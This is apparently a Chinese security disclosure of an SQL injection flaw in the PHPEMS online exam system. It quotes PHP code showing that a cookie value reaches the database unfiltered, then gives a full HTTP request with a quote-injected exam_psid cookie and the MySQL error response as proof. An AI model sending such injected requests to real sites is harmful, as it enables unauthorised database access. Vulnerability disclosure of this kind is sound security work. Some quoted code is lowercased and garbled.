phpems（php exam management system）在线模拟考试系统基于php+mysql开发，主要用于搭建模拟考试平台，支持多种题型和展现方式，是国内首款支持题冒题和自动评分与教师评分相结合的php开源在线模拟考试系统
使用本系统，您可以快速搭建用于模拟考试的网站平台，实现无纸化考试、真实考场模拟、知识强化练习等功能。可满足培训机构、学校、公司等机构各种考试需求。
 代码如下 复制代码
public function __construct(&$g)
    {
        $this->g = $g;
        if (ini_get('magic_quotes_gpc')) {
            $get    = $this->stripslashes($_request);
            $post   = $this->stripslashes($_post);
            $this->cookie = $this->stripslashes($_cookie);
        } else {
            $get    = $_request;
            $post   = $_post;
            $this->cookie = $_cookie;
        }
        $this->file = $_files;
        $this->get = $this->initdata($get);
        $this->post = $this->initdata($post);
        $this->url = $this->parseurl();
    }
..........
    //获取cookie
    public function getcookie($par,$nohead = 0)
    {
        if(isset($this->cookie[ch.$par]))return $this->cookie[ch.$par];
        elseif(isset($this->cookie[$par]) && $nohead)return $this->cookie[$par];
        else return false;
    }
如果用户开启了gpc，程序员还特意使用stripslashes()给关掉。
 代码如下 复制代码
public function getsessionid()
{
    $sessionid = $this->ev->getcookie('psid');
    if(!$sessionid)
    {
        if($this->ev->getcookie('phpsessid',1))
        {
            $this->ev->setcookie('psid',$this->ev->getcookie('phpsessid',1),3600*24);
            $sessionid = $this->ev->getcookie('phpsessid',1);
        }
        else
        {
            $sid = md5($this->ev->getclientip().'/'.$_server['http_x_forwarded_for'].'/'.$_server['remote_addr'].':'.$_server['remote_port'].':'.$_server['http_user_agent'].':'.date('y-m-d'));
            $this->ev->setcookie('psid',$sid,3600*24);
            $sessionid = $sid;
        }
        $data = array('session',array('sessionid'=>$sessionid,'sessionuserid'=>0,'sessionip'=>$this->ev->getclientip()));
        $sql = $this->sql->makereplace($data);
        $this->db->exec($sql);
    }
    $this->sessionid = $sessionid;
    return $this->sessionid;
}
获得psid参数并起保存在$sessionid里
//修改考试会话内容
//参数：会话内容数组
//返回值：true
public function modifyexamsession($args)
{
    $sessionid = $this->session->getsessionid();
    $data = array('examsession',$args,examsessionid = '{$sessionid}');
    $sql = $this->sql->makeupdate($data);
    $this->db->exec($sql);
    return true;
}
任意找了一个进入数据库的地方。
从上面过程看到，没有做任何过滤就进入数据库了。
request:
post /index.php?exam-app-basics-openit http/1.1
host: phpems.0day5.com
proxy-connection: keep-alive
content-length: 79
origin: http://phpems.0day5.com
x-requested-with: xmlhttprequest
user-agent: mozilla/5.0 (windows nt 6.1) applewebkit/537.1 (khtml, like gecko) chrome/21.0.1180.89 safari/537.1
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
referer: http://phpems.0day5.com/index.php?exam-app-basics-detail&basicid=4
accept-encoding: gzip,deflate,sdch
accept-language: zh-cn,zh;q=0.8
accept-charset: gbk,utf-8;q=0.7,*;q=0.3
cookie: exam_psid=c6f1b7acd452e6d72a3ede0f501a9211'; exam_currentuser=%25b4%2585%258b%2585%25ce%25be%258d%257c%2586%2585u%25be%25b8%25be%25c6%25b4%25c2%25b9%25c8%25be%25b8%25bd%25bc%25afu%2586%25c6%2585%2585%2585u%2581%258bm%258e%25be%258d%257c%2588%2585u%25be%25b8%25be%25c6%25b4%25c2%25b9%25c3%25ac%25c6%25be%25ca%25ba%25c5%25afu%2586%25c6%2585%2586%257d%258dm%258c%2581%25b8%2582%258c%257d%2584%2583%258c%2581%2588%25b0%25b5%2582%2585%25ae%258c%257d%25b4%2580%2587%2584%25b7%25af%2588%25ac%2586%257e%2583%257c%2584%257du%2586%25c6%2585%258c%2585u%25be%25b8%25be%25c6%25b4%25c2%25b9%25bc%25bbu%2586%25c6%2585%258c%2585u%257c%2585%2582%2581%257b%2581%257b%2581%257cu%2586%25c6%2585%2584%257f%258dm%25c6%25b0%25c6%25be%25bc%25ba%25c1%25b2%25c5%25ba%25c8%25bb%25bc%25afu%2586%25c6%2585%2584%2585u%2583u%2586%25c6%2585%2584%2581%258dm%25c6%25b0%25c6%25be%25bc%25ba%25c1%25b7%25c2%25b2%25bc%25b9%25c7%25b4%25c0%25b0u%2586%25bc%2585%2584%257e%258b%2584%2588%257c%2589%2582%258b%257e%258e%25be%258d%257c%2588%2585u%25be%25b8%25be%25c6%25b4%25c2%25b9%25c8%25be%25b8%25bd%25c1%25ac%25c0%25b0u%2586%25c6%2585%2589%2585u%257c%2584%257c%2584%257c%2584m%258e%25be%258d%257c%2589%2585u%25be%25b8%25be%25c6%25b4%25c2%25b9%25c7%25b4%25c0%25b0%25bf%25b4%25c0%25b4%25c7m%258e%25b4%258d%257c%2586%2583%258c%2580%2584%2581%258a%2583%2586%2586%25c6%2585%258c%2585u%25be%25b8%25be%25c6%25b4%25c2%25b9%25bc%25afu%2586%25c6%2585%2586%257d%258dm%25b6%2581%25b9%257c%25b5%2582%25b4%25ae%25b7%257f%2588%257d%25b8%2581%25b7%2582%2585%25ac%2586%25b0%25b7%25b0%2583%25b1%2588%257b%2584%25ac%258c%257d%2584%257cu%2586%25d0; cnzzdata5243664=cnzz_eid%3d2105242747-1389515449-%26ntime%3d1389515449%26cnzz_a%3d3%26sin%3dnone%26ltime%3d1389515448225
response:
http/1.1 200 ok
date: sun, 12 jan 2014 09:32:14 gmt
server: apache/2.4.7 (win32) openssl/0.9.8y php/5.4.22
x-powered-by: php/5.4.22
p3p: cp=cao psa our
content-length: 606
content-type: text/html; charset=utf-8
erro:select * from x2_session as session where sessionid = 'c6f1b7acd452e6d72a3ede0f501a9211'' limit 0,100:you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''c6f1b7acd452e6d72a3ede0f501a9211'' limit 0,100' at line 1erro:update x2_session as session set `sessionlasttime` = '1389519134' where sessionid = 'c6f1b7acd452e6d72a3ede0f501a9211'':you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''c6f1b7acd452e6d72a3ede0f501a9211''' at line 1
漏洞证明。